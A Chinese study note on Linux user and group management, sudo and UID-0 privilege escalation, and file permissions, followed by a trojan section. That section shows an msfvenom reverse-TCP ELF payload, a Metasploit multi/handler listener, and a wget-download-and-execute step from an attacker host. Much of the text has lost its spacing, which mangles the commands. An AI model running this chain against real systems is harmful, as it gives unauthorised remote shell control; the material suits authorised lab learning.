)
本文仅用于网络安全学习、防御加固与合法渗透测试所有操作仅限在靶机或已获得书面授权的环境中进行。严禁用于非法攻击、入侵、数据窃取等违法犯罪行为否则后果自负。一、Linux 用户与组管理1.1 /etc/passwd 文件解析/etc/passwd是系统用户基本信息配置文件每行对应一个用户格式如下用户名:密码占位符(x):用户ID(UID):组ID(GID):用户说明:用户主目录:命令解释器示例root:x:0:0:root:/root:/usr/bin/zsh1.2 用户分类用户类型UID 范围说明root 用户0系统最高权限用户系统用户1-999用于服务进程运行无登录权限普通用户≥1000手动创建的可登录用户1.3 组的概念主组Primary Group用户创建文件时默认归属的组附加组Supplementary Group用户可加入的额外权限组查看所有组cat /etc/group1.4 常用用户操作命令1新建用户# -m 自动创建用户主目录useradd-m用户名2设置用户密码passwd用户名linux系统中密码密文存放的文件/etc/shadow3修改用户所属组# -a 追加-G 指定附加组usermod-aG组名 用户名# 示例将用户123添加到sudo组usermod-aGsudo1231.5 普通用户提权方式1添加到sudo组推荐# 查看组文件cat/etc/group# 查询用户是否在sudo组grepsudo/etc/group#输出例子sudo:x:27:user1,user2# 将用户加入sudo组usermod-aGsudo用户名方式2修改/etc/sudoers文件# 编辑sudoers文件使用nano避免语法错误nano/etc/sudoers# 添加如下配置赋予用户全部sudo权限用户名ALL(ALL:ALL)ALL# 赋予整个组sudo权限示例%sudoALL(ALL:ALL)ALL方式3修改UID为0不推荐等同于root# 编辑/etc/passwd文件nano/etc/passwd# 将普通用户行修改为替换为实际用户名用户名:x:0:0:root:/root:/usr/bin/zsh二、Linux 文件权限管理2.1 查看文件权限# 查看文件/目录详细权限信息ls-l文件名 ll 文件名# 等同于ls -l2.2 权限表示规则10位字符示例-rwxr-xr--表示普通文件、所有者有读写执行权限、所属组有读执行权限、其他用户仅读权限位置含义示例值第1位文件类型-普通文件、d目录、l软链接、b块设备、c字符设备、ssocket、p管道 2-4位所有者权限urwx读、写、执行5-7位所属组权限gr-x读、执行8-10位其他用户权限or--仅读2.3 权限数字表示法核心规则r4、w2、x1权限值为对应数字之和权限组合数字值说明rwx7读写执行r-x5读执行r–4仅读—0无权限2.4 修改文件权限chmod# 方式1符号表示法chmodurwx,grx,orx 文件名# 设置所有者rwx、所属组rx、其他rxchmoduw test.txt# 给所有者添加写权限chmodg-x test.txt# 取消所属组执行权限chmodor test.txt# 给其他用户设置仅读权限# 方式2数字表示法chmod755test.txt# 所有者rwx、所属组rx、其他rxchmod-R777/home/test# 递归设置目录及子文件全部权限慎用2.5 修改文件所有者/所属组chown# 修改文件所有者和所属组chown用户名:用户组 文件名# 示例将test文件所有者改为user1所属组改为user1chownuser1:user1test三、木马重要提醒严禁用于非法攻击、入侵、数据窃取等违法犯罪行为所有操作仅限在靶机或已获得书面授权的环境中进行。否则后果自负。3.1 木马核心概念定义伪装成合法软件、隐蔽运行在目标设备中用于长期控制或窃取数据的恶意程序关键特征伪装性、隐蔽性危害设备沦为“肉鸡”攻击者可远程执行任意操作区别于合法远程工具向日葵/TeamViewer等工具需用户知情并授权木马则是隐蔽控制3.2 攻击方式基于Kali Linux MSF框架1制作木马程序# 生成Linux x64反向连接木马# LHOST攻击机KaliIPLPORT监听端口-f输出格式-o输出文件msfvenom-plinux/x64/shell/reverse_tcpLHOST攻击机IPLPORT9999-felf-oshell.elf2启动MSF监听程序# 进入MSF控制台msfconsole# 配置监听模块use exploit/multi/handlersetpayload linux/x64/shell/reverse_tcpsetlhost 攻击机IPsetlport9999# 启动监听run3植入并启动木马步骤1木马文件传输到靶机# 将木马移动到Apache根目录mvshell.elf /var/www/html# 启动Apache服务serviceapache2 start步骤2目标靶机下载并执行木马# 从Kali下载木马文件wgethttp://攻击机IP/shell.elf-Oshell.elf# 添加执行权限解决权限拒绝问题chmodx shell.elf# 启动木马后台运行避免退出终端后停止./shell.elf四、总结用户权限核心root用户UID为0拥有最高权限普通用户可通过加入sudo组或修改sudoers文件提权文件权限可通过chmod修改权限、chown修改属主管理。权限数字规则r4、w2、x1权限组合值为数字之和755表示所有者rwx、所属组和其他rx777为全部权限慎用。木马攻击流程MSF生成反向连接木马 → 启动MSF监听 → 目标机下载并执行木马可通过开机自启、服务常驻等方式实现持久化控制。五、 重要声明本文为学习笔记整理如有错误或不足欢迎大家在评论区指正交流一起进步本文所涉及的网络攻击、渗透测试、漏洞验证、流量分析等技术内容仅限在合法授权的私有靶场、实验环境、教学平台内进行学习与研究。严禁将任何攻击手段、工具、思路用于未获得明确书面授权的真实网站、服务器、网络设备及个人设备。未经许可对他人系统、网络、数据进行扫描、入侵、破坏、窃取或干扰均属于违法行为。一切测试与学习行为必须严格遵守《中华人民共和国网络安全法》《中华人民共和国刑法》《中华人民共和国数据安全法》等相关法律法规恪守网络安全职业道德与底线。坚守白帽底线维护网络空间安全做合法合规的安全从业者与学习者。